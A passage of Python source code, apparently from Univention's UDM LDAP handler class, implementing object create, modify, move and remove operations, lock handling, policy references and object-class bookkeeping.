to.\n \"\"\"\n self.request_lock('cn-uid-position', newdn)\n\n def _ldap_post_rename(self, olddn): # type: (str) -> None\n \"\"\"\n Hook which is called after renaming the object.\n\n :param str olddn: The old distiguished name the object was renamed from.\n \"\"\"\n\n def _ldap_pre_move(self, newdn): # type: (str) -> None\n \"\"\"\n Hook which is called before the object moving.\n\n :param str newdn: The new distiguished name the object will be moved to.\n \"\"\"\n self.request_lock('cn-uid-position', newdn)\n\n def _ldap_post_move(self, olddn): # type: (str) -> None\n \"\"\"\n Hook which is called after the object moving.\n\n :param str olddn: The old distiguished name the object was moved from.\n \"\"\"\n\n def _ldap_pre_remove(self): # type: () -> None\n \"\"\"Hook which is called before the object removal.\"\"\"\n\n def _ldap_post_remove(self): # type: () -> None\n \"\"\"Hook which is called after the object removal.\"\"\"\n self._release_locks()\n\n def _safe_cancel(self): # type: () -> None\n try:\n self.cancel()\n except (KeyboardInterrupt, SystemExit, SyntaxError):\n raise\n except Exception:\n ud.debug(ud.ADMIN, ud.ERROR, \"cancel() failed: %s\" % (traceback.format_exc(),))\n\n def _falsy_boolean_extended_attributes(self, info): # type: (_Properties) -> _Properties\n m = univention.admin.modules.get(self.module)\n for prop in getattr(m, 'extended_udm_attributes', []):\n if prop.syntax == 'boolean' and not info.get(prop.name):\n info[prop.name] = u'0'\n return info\n\n def exists(self): # type: () -> bool\n \"\"\"\n Indicates that this object exists in LDAP.\n\n :returns: True if the object exists in LDAP, False otherwise.\n :rtype: bool\n \"\"\"\n return self._exists\n\n def _validate_superordinate(self, must_exists=True): # type: (bool) -> None\n \"\"\"\n Checks if the superordinate is set to a valid :class:`univention.admin.handlers.simpleLdap` object if this module requires a superordinate.\n It is ensured that the object type of the superordinate is correct.\n It is ensured that the object lies underneath of the superordinate position.\n\n :raises: :class:`univention.admin.uexceptions.insufficientInformation`\n\n :raises: :class:`univention.admin.uexceptions.noSuperordinate`\n \"\"\"\n superordinate_names = set(univention.admin.modules.superordinate_names(self.module))\n if not superordinate_names:\n return # module has no superodinates\n\n if not self.dn and not self.position:\n # this check existed in all modules with superordinates, so still check it here, too\n raise univention.admin.uexceptions.insufficientInformation(_('Neither DN nor position given.'))\n\n if not self.superordinate:\n self.superordinate = univention.admin.objects.get_superordinate(self.module, None, self.lo, self.dn or self.position.getDn())\n\n if not self.superordinate:\n if superordinate_names == {'settings/cn'}:\n ud.debug(ud.ADMIN, ud.WARN, 'No settings/cn superordinate was given.')\n return # settings/cn might be misued as superordinate, don't risk currently\n if not must_exists:\n return\n raise univention.admin.uexceptions.noSuperordinate(_('No superordinate object given'))\n\n # check if the superordinate is of the correct object type\n if not {self.superordinate.module} & superordinate_names:\n raise univention.admin.uexceptions.insufficientInformation(_('The given %r superordinate is expected to be of type %s.') % (self.superordinate.module, ', '.join(superordinate_names)))\n\n if self.dn and not self._ensure_dn_in_subtree(self.superordinate.dn, self.lo.parentDn(self.dn)):\n raise univention.admin.uexceptions.insufficientInformation(_('The DN must be underneath of the superordinate.'))\n\n def _ensure_dn_in_subtree(self, parent, dn): # type: (Text, Text) -> bool\n \"\"\"\n Checks if the given DN is underneath of the subtree of the given parent DN.\n\n :param str parent: The distiguished name of the parent container.\n :param str dn: The distinguished name to check.\n :returns: True if `dn` is underneath of `parent`, False otherwise.\n :rtype: bool\n \"\"\"\n while dn:\n if self.lo.compare_dn(dn, parent):\n return True\n dn = self.lo.parentDn(dn)\n return False\n\n def call_udm_property_hook(self, hookname, module, changes=None): # types: (Text, Text, Dict[str, Tuple]) -> Dict[str, Tuple]\n \"\"\"\n Internal method to call a hook scripts of extended attributes.\n\n :param str hookname: The name of the hook function to call.\n :param str module: The name of the UDM module.\n :param dict changes: A list of changes.\n :returns: The (modified) list of changes.\n :rtype: dict or None\n \"\"\"\n m = univention.admin.modules.get(module.module)\n if hasattr(m, 'extended_udm_attributes'):\n for prop in m.extended_udm_attributes:\n if prop.hook is not None:\n func = getattr(prop.hook, hookname, None)\n if changes is None:\n func(module)\n else:\n changes = func(module, changes)\n return changes\n\n def open(self): # type: () -> None\n \"\"\"\n Opens this object.\n\n During the initialization of this object the current set LDAP attributes are mapped into :py:attr:`info`.\n This method makes it possible to e.g. resolve external references to other objects which are not represented in the raw LDAP attributes\n of this object, for example the group memberships of a user.\n\n By default only the `open` hook for extended attributes is called.\n This method can be subclassed.\n\n .. warning::\n If this method changes anything in self.info it *must* call :py:meth:`save` afterwards.\n\n .. warning::\n If your are going to do any modifications (such as creating, modifying, moving, removing this object)\n this method must be called directly after the constructor and before modifying any property.\n \"\"\"\n self._open = True\n self.call_udm_property_hook('hook_open', self)\n self.save()\n\n def _remove_option(self, name): # type: (str) -> None\n \"\"\"\n Removes the UDM option if it is set.\n\n :param str name: The name of the option to remove.\n \"\"\"\n if name in self.options:\n self.options.remove(name)\n\n def __set_options(self): # type: () -> None\n \"\"\"Enables the UDM options of this object by evaluating the currently set LDAP object classes. If the object does not exists yet the default options are enabled.\"\"\"\n options = univention.admin.modules.options(self.module)\n if 'objectClass' in self.oldattr:\n ocs = {x.decode('UTF-8') for x in self.oldattr['objectClass']}\n self.options = [\n opt\n for opt, option in options.items()\n if not option.disabled and option.matches(ocs) and self.__app_option_enabled(opt, option)\n ]\n else:\n ud.debug(ud.ADMIN, ud.INFO, 'reset options to default by _define_options')\n self.options = []\n self._define_options(options)\n\n def _define_options(self, module_options):\n # type: (Dict[str, Any]) -> None\n \"\"\"\n Enables all UDM options which are enabled by default.\n\n :param dict module_options: A mapping of option-name to option.\n \"\"\"\n ud.debug(ud.ADMIN, ud.INFO, 'modules/__init__.py _define_options: reset to default options')\n self.options.extend(\n name\n for name, opt in module_options.items()\n if not opt.disabled and opt.default\n )\n\n def option_toggled(self, option): # type: (str) -> bool\n \"\"\"\n Checks if an UDM option was changed.\n\n :param str option: The name of the option to check.\n :returns: True if the option was changed, False otherwise.\n :rtype: bool\n\n .. warning::\n This does not work for not yet existing objects.\n \"\"\"\n return option in set(self.options) ^ set(self.old_options)\n\n def policy_reference(self, *policies):\n for policy in policies:\n if not ldap.dn.is_dn(policy):\n raise univention.admin.uexceptions.valueInvalidSyntax(policy)\n try:\n if b'univentionPolicy' not in self.lo.getAttr(policy, 'objectClass', required=True):\n raise univention.admin.uexceptions.valueError('Object is not a policy', policy)\n except ldap.NO_SUCH_OBJECT:\n raise univention.admin.uexceptions.noObject('Policy does not exists', policy)\n self.policies.extend(policy for policy in policies if not any(self.lo.compare_dn(pol, policy) for pol in self.policies))\n\n def policy_dereference(self, *policies):\n for policy in policies:\n if not ldap.dn.is_dn(policy):\n raise univention.admin.uexceptions.valueInvalidSyntax(policy)\n self.policies = [policy for policy in self.policies if not any(self.lo.compare_dn(pol, policy) for pol in policies)]\n\n def policiesChanged(self):\n # type: () -> bool\n return set(self.oldpolicies) != set(self.policies)\n\n def __app_option_enabled(self, name, option):\n if option.is_app_option:\n return all(self[pname] in ('TRUE', '1', 'OK') for pname, prop in self.descriptions.items() if name in prop.options and prop.syntax.name in ('AppActivatedBoolean', 'AppActivatedTrue', 'AppActivatedOK'))\n return True\n\n def description(self): # type: () -> str\n \"\"\"\n Return a descriptive string for the object.\n By default the relative distinguished name is returned.\n\n :returns: A descriptive string or `none` as fallback.\n :rtype: str\n \"\"\"\n if self.dn:\n return u'+'.join(explode_rdn(self.dn, 1))\n else:\n for name, property in self.descriptions.items():\n if property.identifies:\n syntax = property.syntax\n return syntax.tostring(self[name])\n return u'none'\n\n def _post_unmap(self, info, values):\n \"\"\"\n This method can be overwritten to define special un-map methods to map\n back from LDAP to UDM that can not be done with the default mapping API.\n\n :param info: The list of UDM properties.\n :param values: The list of LDAP attributes.\n :returns: The (modified) list of UDM properties.\n :rtype:\n \"\"\"\n return info\n\n def _post_map(self, modlist, diff):\n \"\"\"\n This method can be overwritten to define special map methods to map from\n UDM to LDAP that can not be done with the default mapping API.\n\n :param modlist: The list of LDAP modifications.\n :param list diff: A list of modified UDM properties.\n :returns: The (modified) list of LDAP modifications.\n :rtype:\n \"\"\"\n return modlist\n\n def _ldap_addlist(self): # type: () -> List[Tuple[Text, Any]]\n return []\n\n def _ldap_modlist(self):\n \"\"\"\n Builds the list of modifications when creating and modifying this object.\n\n It compares the old properties (:py:attr:`oldinfo`) with the new properties (:py:attr:`info`) and applies the LDAP mapping.\n Differences are added to the modlist which consists of a tuple with three items:\n\n (\"LDAP attribute-name\", [old, values], [new, values])\n\n (\"LDAP attribute-name\", old_value, new_value)\n\n (\"LDAP attribute-name\", None, added_value)\n\n .. seealso:: :mod:`univention.uldap` for further information about the format of the modlist.\n\n This method can be overridden in a subclass to add special behavior, e.g. for properties which have no mapping defined.\n\n .. caution:: The final modlist used for creation of objects is mixed with the :func:`univention.admin.handlers.simpleLdap._ldap_addlist`.\n Make sure this method don't add attributes which are already set.\n\n :rtype: list of tuples\n \"\"\"\n diff_ml = self.diff()\n ml = univention.admin.mapping.mapDiff(self.mapping, diff_ml)\n ml = self._post_map(ml, diff_ml)\n\n if self.policiesChanged():\n policy_ocs_set = b'univentionPolicyReference' in self.oldattr.get('objectClass', [])\n if self.policies and not policy_ocs_set:\n ml.append(('objectClass', b'', [b'univentionPolicyReference']))\n elif not self.policies and policy_ocs_set:\n ml.append(('objectClass', b'univentionPolicyReference', b''))\n ml.append(('univentionPolicyReference', [x.encode('UTF-8') for x in self.oldpolicies], [x.encode('UTF-8') for x in self.policies]))\n\n return ml\n\n def _create(self, response=None, serverctrls=None):\n \"\"\"Create the object. Should only be called by :func:`univention.admin.handlers.simpleLdap.create`.\"\"\"\n self._ldap_pre_create()\n self._update_policies()\n self.call_udm_property_hook('hook_ldap_pre_create', self)\n\n self.set_default_values()\n\n # iterate over all properties and call checkLdap() of corresponding syntax\n self._call_checkLdap_on_all_property_syntaxes()\n\n al = self._ldap_addlist()\n al.extend(self._ldap_modlist())\n al = self._ldap_object_classes_add(al)\n al = self.call_udm_property_hook('hook_ldap_addlist', self, al)\n\n # ensure univentionObject is set\n al.append(('objectClass', [b'univentionObject']))\n al.append(('univentionObjectType', [self.module.encode('utf-8')]))\n\n ud.debug(ud.ADMIN, ud.INFO, \"create object with dn: %s\" % (self.dn,))\n ud.debug(ud.ADMIN, 99, 'Create dn=%r;\\naddlist=%r;' % (self.dn, al))\n\n # if anything goes wrong we need to remove the already created object, otherwise we run into 'already exists' errors\n try:\n self.lo.add(self.dn, al, serverctrls=serverctrls, response=response)\n self._exists = True\n self._ldap_post_create()\n except Exception:\n # ensure that there is no lock left\n exc = sys.exc_info()\n ud.debug(ud.ADMIN, ud.PROCESS, \"Creating %r failed: %r\" % (self.dn, exc[1]))\n try:\n self.cancel()\n except Exception:\n ud.debug(ud.ADMIN, ud.ERROR, \"Post-create: cancel() failed: %s\" % (traceback.format_exc(),))\n try:\n if self._exists: # add succeeded but _ldap_post_create failed!\n obj = univention.admin.objects.get(univention.admin.modules.get(self.module), None, self.lo, self.position, self.dn)\n obj.open()\n obj.remove()\n except Exception:\n ud.debug(ud.ADMIN, ud.ERROR, \"Post-create: remove() failed: %s\" % (traceback.format_exc(),))\n six.reraise(exc[0], exc[1], exc[2])\n\n self.call_udm_property_hook('hook_ldap_post_create', self)\n\n self.save()\n return self.dn\n\n def _ldap_object_classes_add(self, al):\n m = univention.admin.modules.get(self.module)\n # evaluate extended attributes\n ocs = set() # type: Set[str]\n for prop in getattr(m, 'extended_udm_attributes', []):\n ud.debug(ud.ADMIN, ud.INFO, 'simpleLdap._create: info[%s]:%r = %r' % (prop.name, self.has_property(prop.name), self.info.get(prop.name)))\n if prop.syntax == 'boolean' and self.info.get(prop.name) == u'0':\n continue\n if self.has_property(prop.name) and self.info.get(prop.name):\n ocs.add(prop.objClass)\n\n module_options = univention.admin.modules.options(self.module)\n # add object classes of (especially extended) options\n for option in ['default'] + self.options:\n try:\n opt = module_options[option]\n except KeyError:\n ud.debug(ud.ADMIN, ud.INFO, '%r does not specify option %r' % (m.module, option))\n continue\n ocs |= set(opt.objectClasses)\n\n # remove duplicated object classes\n for i in al:\n key, val = i[0], i[-1] # might be a triple\n if val and key.lower() == 'objectclass':\n val_list = [val] if not isinstance(val, (tuple, list)) else val\n val_unicode = [x.decode('UTF-8') if isinstance(x, bytes) else x for x in val_list]\n ocs -= set(val_unicode) # TODO: check six.string_types vs bytes everywhere for ocs calculations\n if ocs:\n al.append(('objectClass', [x.encode('UTF-8') for x in ocs]))\n\n return al\n\n def _modify(self, modify_childs=True, ignore_license=False, response=None, serverctrls=None):\n \"\"\"Modify the object. Should only be called by :func:`univention.admin.handlers.simpleLdap.modify`.\"\"\"\n self.__prevent_ad_property_change()\n\n self._ldap_pre_modify()\n self._update_policies()\n self.call_udm_property_hook('hook_ldap_pre_modify', self)\n\n self.set_default_values()\n self._fix_app_options()\n\n # iterate over all properties and call checkLdap() of corresponding syntax\n self._call_checkLdap_on_all_property_syntaxes()\n\n ml = self._ldap_modlist()\n ml = self.call_udm_property_hook('hook_ldap_modlist', self, ml)\n ml = self._ldap_object_classes(ml)\n\n class wouldRename(Exception):\n @classmethod\n def on_rename(cls, dn, new_dn, ml):\n raise cls(dn, new_dn)\n\n # FIXME: timeout without exception if objectClass of Object is not exsistant !!\n ud.debug(ud.ADMIN, 99, 'Modify dn=%r;\\nmodlist=%r;\\noldattr=%r;' % (self.dn, ml, self.oldattr))\n try:\n self.dn = self.lo.modify(self.dn, ml, ignore_license=ignore_license, serverctrls=serverctrls, response=response, rename_callback=wouldRename.on_rename)\n except wouldRename as exc:\n self._ldap_pre_rename(exc.args[1])\n self.dn = self.lo.modify(self.dn, ml, ignore_license=ignore_license, serverctrls=serverctrls, response=response)\n self._ldap_post_rename(exc.args[0])\n if ml:\n self._write_admin_diary_modify()\n\n self._ldap_post_modify()\n self.call_udm_property_hook('hook_ldap_post_modify', self)\n\n self.save()\n return self.dn\n\n def set_default_values(self): # type: () -> None\n \"\"\"Sets all the default values of all properties.\"\"\"\n # Make sure all default values are set...\n for name, p in self.descriptions.items():\n # ... if property has no option or any required option is currently enabled\n if not self.has_property(name):\n continue\n set_defaults = self.set_defaults\n if not self.set_defaults and p.options and not set(self.old_options) & set(p.options):\n # set default values of properties which depend on an option but weren't activated prior modifying\n self.set_defaults = True\n try:\n if p.default(self):\n self[name] # __getitem__ sets default value\n finally:\n self.set_defaults = set_defaults\n\n def _fix_app_options(self): # type: () -> None\n # for objects with objectClass=appObject and appObjectActivated=0 we must set appObjectActivated=1\n for option, opt in getattr(univention.admin.modules.get(self.module), 'options', {}).items():\n if not opt.is_app_option or not self.option_toggled(option) or option not in self.options:\n continue\n for pname, prop in self.descriptions.items():\n if option in prop.options and prop.syntax.name in ('AppActivatedBoolean', 'AppActivatedTrue', 'AppActivatedOK'):\n self[pname] = True\n\n def _ldap_object_classes(self, ml): # type: (list) -> list\n \"\"\"Detects the attributes changed in the given modlist, calculates the changes of the object class and appends it to the modlist.\"\"\"\n m = univention.admin.modules.get(self.module)\n\n def lowerset(vals):\n # type: (Iterable[str]) -> Set[str]\n return {x.lower() for x in vals}\n\n ocs = lowerset(x.decode('UTF-8') for x in _MergedAttributes(self, ml).get_attribute('objectClass'))\n unneeded_ocs = set() # type: Set[Text]\n required_ocs = set() # type: Set[Text]\n\n # evaluate (extended) options\n module_options = univention.admin.modules.options(self.module)\n available_options = set(module_options)\n options = set(self.options)\n if 'default' in available_options:\n options |= {'default'}\n old_options = set(self.old_options)\n if options != old_options:\n ud.debug(ud.ADMIN, ud.INFO, 'options=%r; old_options=%r' % (options, old_options))\n unavailable_options = (options - available_options) | (old_options - available_options)\n if unavailable_options:\n # Bug #46586: as we simulate legacy options, this is no longer an error\n ud.debug(ud.ADMIN, ud.INFO, '%r does not provide options: %r' % (self.module, unavailable_options))\n added_options = options - old_options - unavailable_options\n removed_options = old_options - options - unavailable_options\n\n # evaluate extended attributes\n for prop in getattr(m, 'extended_udm_attributes', []):\n ud.debug(ud.ADMIN, ud.INFO, 'simpleLdap._modify: extended attribute=%r oc=%r' % (prop.name, prop.objClass))\n\n if self.has_property(prop.name) and self.info.get(prop.name) and (True if prop.syntax != 'boolean' else self.info.get(prop.name) != '0'):\n required_ocs |= {prop.objClass}\n continue\n\n if prop.deleteObjClass:\n unneeded_ocs |= {prop.objClass}\n\n # if the value is unset we need to remove the attribute completely\n if self.oldattr.get(prop.ldapMapping):\n ml = [x for x in ml if x[0].lower() != prop.ldapMapping.lower()]\n ml.append((prop.ldapMapping, self.oldattr.get(prop.ldapMapping), b''))\n\n unneeded_ocs |= {oc for option in removed_options for oc in module_options[option].objectClasses}\n required_ocs |= {oc for option in added_options for oc in module_options[option].objectClasses}\n\n ocs -= lowerset(unneeded_ocs)\n ocs |= lowerset(required_ocs)\n if lowerset(x.decode('utf-8') for x in self.oldattr.get('objectClass', [])) == ocs:\n return ml\n\n ud.debug(ud.ADMIN, ud.INFO, 'OCS=%r; required=%r; removed: %r' % (ocs, required_ocs, unneeded_ocs))\n\n # case normalize object class names\n schema = self.lo.get_schema()\n ocs = {x.names[0] for x in (schema.get_obj(ldap.schema.models.ObjectClass, x) for x in ocs) if x}\n\n # make sure we still have a structural object class\n if not schema.get_structural_oc(ocs):\n structural_ocs = schema.get_structural_oc(unneeded_ocs)\n if not structural_ocs:\n ud.debug(ud.ADMIN, ud.ERROR, 'missing structural object class. Modify will fail.')\n return ml\n ud.debug(ud.ADMIN, ud.WARN, 'Preventing to remove last structural object class %r' % (structural_ocs,))\n ocs -= set(schema.get_obj(ldap.schema.models.ObjectClass, structural_ocs).names)\n\n # validate removal of object classes\n must, may = schema.attribute_types(ocs)\n allowed = {name.lower() for attr in may.values() for name in attr.names} | {name.lower() for attr in must.values() for name in attr.names}\n\n ml = [x for x in ml if x[0].lower() != 'objectclass']\n ml.append(('objectClass', self.oldattr.get('objectClass', []), [x.encode('utf-8') for x in ocs]))\n newattr = ldap.cidict.cidict(_MergedAttributes(self, ml).get_attributes())\n\n # make sure only attributes known by the object classes are set\n for attr, val in newattr.items():\n if not val:\n continue\n if re.sub(u';binary$', u'', attr.lower()) not in allowed:\n ud.debug(ud.ADMIN, ud.WARN, 'The attribute %r is not allowed by any object class.' % (attr,))\n # ml.append((attr, val, [])) # TODO: Remove the now invalid attribute instead\n return ml\n\n # require all MUST attributes to be set\n for attr in must.values():\n if not any(newattr.get(name) or newattr.get(u'%s;binary' % (name,)) for name in attr.names):\n ud.debug(ud.ADMIN, ud.WARN, 'The attribute %r is required by the current object classes.' % (attr.names,))\n return ml\n\n ml = [x for x in ml if x[0].lower() != 'objectclass']\n ml.append(('objectClass', self.oldattr.get('objectClass', []), [x.encode('utf-8') for x in ocs]))\n\n return ml\n\n def _move_in_subordinates(self, olddn):\n result = self.lo.searchDn(base=self.lo.base, filter=filter_format(u'(&(objectclass=person)(secretary=%s))', [olddn]))\n for subordinate in result:\n self.lo.modify(subordinate, [('secretary', olddn.encode('utf-8'), self.dn.encode('utf-8'))])\n\n def _move_in_groups(self, olddn):\n for group in self.oldinfo.get('groups', []) + [self.oldinfo.get('machineAccountGroup', '')]:\n if group != '':\n try:\n self.lo.modify(\n group, [('uniqueMember', [olddn.encode(\"UTF-8\")], None)])\n except univention.admin.uexceptions.ldapError as exc:\n if not isinstance(exc.original_exception, ldap.NO_SUCH_ATTRIBUTE):\n raise\n try:\n self.lo.modify(group, [('uniqueMember', None, [self.dn.encode(\"UTF-8\")])])\n except univention.admin.uexceptions.ldapError as exc:\n if not isinstance(exc.original_exception, ldap.TYPE_OR_VALUE_EXISTS):\n raise\n\n def _move(self, newdn, modify_childs=True, ignore_license=False): # type: (str, bool, bool) -> str\n \"\"\"Moves this object to the new DN. Should only be called by :func:`univention.admin.handlers.simpleLdap.move`.\"\"\"\n self._ldap_pre_move(newdn)\n\n olddn = self.dn\n self.lo.rename(self.dn, newdn)\n self.dn = newdn\n\n try:\n self._move_in_groups(olddn) # can be done always, will do nothing if oldinfo has no attribute 'groups'\n self._move_in_subordinates(olddn)\n self._ldap_post_move(olddn)\n except Exception:\n # move back\n ud.debug(ud.ADMIN, ud.WARN, 'simpleLdap._move: self._ldap_post_move failed, move object back to %s' % olddn)\n self.lo.rename(self.dn, olddn)\n self.dn = olddn\n raise\n self._write_admin_diary_move(newdn)\n return self.dn\n\n def _write_admin_diary_move(self, position):\n self._write_admin_diary_event('MOVED', {'position': position})\n\n def _remove(self, remove_childs=False): # type: (bool) -> None\n \"\"\"Removes this object. Should only be called by :func:`univention.admin.handlers.simpleLdap.remove`.\"\"\"\n ud.debug(ud.ADMIN, ud.INFO, 'handlers/__init__._remove() called for %r with remove_childs=%r' % (self.dn, remove_childs))\n\n if _prevent_to_change_ad_properties and self._is_synced_object():\n raise univention.admin.uexceptions.invalidOperation(_('Objects from Active Directory can not be removed.'))\n\n self._ldap_pre_remove()\n self.call_udm_property_hook('hook_ldap_pre_remove', self)\n\n if remove_childs:\n subelements = [] # type: List[Tuple[str, Dict[str, List[str]]]]\n if b'FALSE' not in self.lo.getAttr(self.dn, 'hasSubordinates'):\n ud.debug(ud.ADMIN, ud.INFO, 'handlers/__init__._remove() children of base dn %s' % (self.dn,))\n subelements = self.lo.search(base=self.dn, scope='one', attr=[])\n\n for subolddn, suboldattrs in subelements:\n ud.debug(ud.ADMIN, ud.INFO, 'remove: subelement %s' % (subolddn,))\n for submodule in univention.admin.modules.identify(subolddn, suboldattrs):\n subobject = submodule.object(None, self.lo, None, dn=subolddn, attributes=suboldattrs)\n subobject.open()\n try:\n subobject.remove(remove_childs)\n except univention.admin.uexceptions.base as exc:\n ud.debug(ud.ADMIN, ud.ERROR, 'remove: could not remove %r: %s: %s' % (subolddn, type(exc).__name__, exc))\n break\n else:\n ud.debug(ud.ADMIN, ud.WARN, 'remove: could not identify UDM module of %r' % (subolddn,))\n\n self.lo.delete(self.dn)\n self._exists = False\n\n self._ldap_post_remove()\n\n self.call_udm_property_hook('hook_ldap_post_remove', self)\n self.oldattr = {}\n self._write_admin_diary_remove()\n self.save()\n\n def _write_admin_diary_remove(self):\n # type: () -> None\n self._write_admin_diary_event('REMOVED')\n\n def loadPolicyObject(self, policy_type, reset=0): # type: (str, int) -> simplePolicy\n pathlist = []\n\n ud.debug(ud.ADMIN, ud.INFO, \"loadPolicyObject: policy_type: %s\" % policy_type)\n policy_module = univention.admin.modules.get(policy_type)\n\n # overwrite property descriptions\n univention.admin.ucr_overwrite_properties(policy_module, self.lo)\n # re-build layout if there any overwrites defined\n univention.admin.ucr_overwrite_module_layout(policy_module)\n\n # retrieve path info from 'cn=directory,cn=univention,' object\n pathResult = self.lo.get('cn=directory,cn=univention,' + self.position.getDomain())\n if not pathResult:\n pathResult = self.lo.get('cn=default containers,cn=univention,' + self.position.getDomain())\n for i in pathResult.get('univentionPolicyObject', []):\n i = i.decode('utf-8')\n try:\n self.lo.searchDn(base=i, scope='base')\n pathlist.append(i)\n ud.debug(ud.ADMIN, ud.INFO, \"loadPolicyObject: added path %s\" % i)\n except Exception:\n ud.debug(ud.ADMIN, ud.INFO, \"loadPolicyObject: invalid path setting: %s does not exist in LDAP\" % i)\n continue # looking for next policy container\n break # at least one item has been found; so we can stop here since only pathlist[0] is used\n\n if not pathlist:\n policy_position = self.position\n else:\n policy_position = univention.admin.uldap.position(self.position.getBase())\n policy_path = pathlist[0]\n try:\n prefix = univention.admin.modules.policyPositionDnPrefix(policy_module)\n self.lo.searchDn(base=u\"%s,%s\" % (prefix, policy_path), scope='base')\n policy_position.setDn(u\"%s,%s\" % (prefix, policy_path))\n except Exception:\n policy_position.setDn(policy_path)\n\n for dn in self.policies:\n if univention.admin.modules.recognize(policy_module, dn, self.lo.get(dn)) and self.policyObjects.get(policy_type, None) and self.policyObjects[policy_type].cloned == dn and not reset:\n return self.policyObjects[policy_type]\n\n for dn in self.policies:\n modules = univention.admin.modules.identify(dn, self.lo.get(dn))\n for module in modules:\n if univention.admin.modules.name(module) == policy_type:\n self.policyObjects[policy_type] = univention.admin.objects.get(module, None, self.lo, policy_position, dn=dn)\n self.policyObjects[policy_type].clone(self)\n self._init_ldap_search(self.policyObjects[policy_type])\n\n return self.policyObjects[policy_type]\n if not modules:\n self.policies.remove(dn)\n\n if not self.policyObjects.get(policy_type, None) or reset:\n self.policyObjects[policy_type] = univention.admin.objects.get(policy_module, None, self.lo, policy_position)\n self.policyObjects[policy_type].copyIdentifier(self)\n self._init_ldap_search(self.policyObjects[policy_type])\n\n return self.policyObjects[policy_type]\n\n def _init_ldap_search(self, policy): # type: (simplePolicy) -> None\n properties = {} # type: Dict[str, univention.admin.property]\n if hasattr(policy, 'property_descriptions'):\n properties = policy.property_descriptions\n elif hasattr(policy, 'descriptions'):\n properties = policy.descriptions\n for pname, prop in properties.items():\n if prop.syntax.name == 'LDAP_Search':\n prop.syntax._load(self.lo)\n if prop.syntax.viewonly:\n policy.mapping.unregister(pname, False)\n\n def _update_policies(self): # type: () -> None\n for policy_type, policy_object in self.policyObjects.items():\n ud.debug(ud.ADMIN, ud.INFO, \"simpleLdap._update_policies: processing policy of type: %s\" % policy_type)\n if policy_object.changes:\n ud.debug(ud.ADMIN, ud.INFO, \"simpleLdap._update_policies: trying to create policy of type: %s\" % policy_type)\n ud.debug(ud.ADMIN, ud.INFO, \"simpleLdap._update_policies: policy_object.info=%s\" % policy_object.info)\n policy_object.create()\n univention.admin.objects.replacePolicyReference(self, policy_type, policy_object.dn)\n\n def closePolicyObjects(self): # type: () -> None\n self.policyObjects = {}\n\n def savePolicyObjects(self): # type: () -> None\n self._update_policies()\n self.closePolicyObjects()\n\n def cancel(self): # type: () -> None\n \"\"\"Cancels the object creation or modification. This method can be subclassed to revert changes for example releasing locks.\"\"\"\n self._release_locks()\n\n def _release_locks(self, name=None): # type: (Optional[str]) -> None\n \"\"\"Release all temporary done locks\"\"\"\n for lock in self.alloc[:]:\n key, value = lock[0:2]\n if name and key != name:\n continue\n self.alloc.remove(lock)\n ud.debug(ud.ADMIN, ud.INFO, 'release_lock(%s): %r' % (key, value))\n univention.admin.allocators.release(self.lo, self.position, key, value)\n\n def _confirm_locks(self): # type: () -> None\n \"\"\"\n Confirm all temporary done locks. self.alloc should contain a 2-tuple or 3-tuple:\n (name:str, value:str) or (name:str, value:str, updateLastUsedValue:bool)\n \"\"\"\n while self.alloc:\n item = self.alloc.pop()\n name, value = item[0:2]\n updateLastUsedValue = True\n if len(item) > 2:\n updateLastUsedValue = item[2]\n univention.admin.allocators.confirm(self.lo, self.position, name, value, updateLastUsedValue=updateLastUsedValue)\n\n def request_lock(self, name, value=None, updateLastUsedValue=True):\n \"\"\"Request a lock for the given value\"\"\"\n try:\n if name == 'sid+user':\n value = univention.admin.allocators.requestUserSid(self.lo, self.position, value)\n name = 'sid'\n else:\n value = univention.admin.allocators.request(self.lo, self.position, name, value)\n except univention.admin.uexceptions.noLock:\n self._release_locks(name)\n raise\n if not updateLastUsedValue: # backwards compatibility: 2er-tuples required!\n self.alloc.append((name, value, updateLastUsedValue))\n else:\n self.alloc.append((name, value))\n return value\n\n def _call_checkLdap_on_all_property_syntaxes(self): # type: () -> None\n \"\"\"\n Calls checkLdap() method on every property if present.\n checkLdap() may raise an exception if the value does not match the constraints of the underlying syntax.\n\n .. deprecated:: 5.0-2\n Univention internal use only!\n \"\"\"\n for pname, prop in self.descriptions.items():\n if hasattr(prop.syntax, 'checkLdap') and (not self.exists() or self.hasChanged(pname)):\n if len(getfullargspec(prop.syntax.checkLdap).args) > 3:\n prop.syntax.checkLdap(self.lo, self.info.get(pname), pname)\n else:\n prop.syntax.checkLdap(self.lo, self.info.get(pname))\n\n def __prevent_ad_property_change(self): # type: () -> None\n if not _prevent_to_change_ad_properties or not self._is_synced_object():\n return\n\n for key in self.descriptions:\n if self.descriptions[key].readonly_when_synced:\n value = self.info.get(key)\n oldval = self.oldinfo.get(key)\n if oldval != value:\n raise univention.admin.uexceptions.valueMayNotChange(_('key=%(key)s old=%(old)s new=%(new)s') % {'key': key, 'old': oldval, 'new': value}, property=key)\n\n def _is_synced_object(self): # type: () -> bool\n \"\"\"Checks whether this object was synchronized from Active Directory to UCS.\"\"\"\n flags = self.oldattr.get('univentionObjectFlag', [])\n return b'synced' in flags and b'docker' not in flags\n\n @classmethod\n def get_default_containers(cls, lo):\n \"\"\"\n Returns list of default containers for this module.\n\n :param univention.admin.uldap.access lo: UDM LDAP access object.\n \"\"\"\n containers = univention.admin.modules.defaultContainers(univention.admin.modules.get_module(cls.module))\n settings_directory = univention.admin.modules.get_module('settings/directory')\n try:\n default_containers = settings_directory.lookup(None, lo, '', required=True)[0]\n except univention.admin.uexceptions.noObject:\n return containers\n\n base = cls.module.split('/', 1)[0]\n if cls.module in ('shares/print', 'shares/printer', 'shares/printergroup'):\n base = 'printers'\n elif cls.module in ('computers/domaincontroller_master', 'computers/domaincontroller_backup', 'computers/domaincontroller_slave', 'computers/windows_domaincontroller'):\n base = 'domaincontroller'\n\n containers.extend(default_containers.info.get(base, []))\n return containers\n\n @classmethod\n def lookup(cls, co, lo, filter_s, base='', superordinate=None, scope='sub', unique=False, required=False, timeout=-1, sizelimit=0, serverctrls=None, response=None): # type: (None, univention.admin.uldap.access, str, str, Optional[str], str, bool, bool, int, int, Optional[List], Optional[Dict]) -> List[simpleLdap]\n \"\"\"\n Perform a LDAP search and return a list of instances.\n\n :param None co: obsolete config\n :param univention.admin.uldap.access lo: UDM LDAP access object.\n :param str filter_s: LDAP filter string.\n :param str base: LDAP search base distinguished name.\n :param str superordinate: Distinguished name of a superordinate object.\n :param str scope: Specify the scope of the search to be one of `base`, `base+one`, `one`, `sub`, or `domain` to specify a base object, base plus one-level, one-level, subtree, or children search.\n :param bool unique: Raise an exception if more than one object 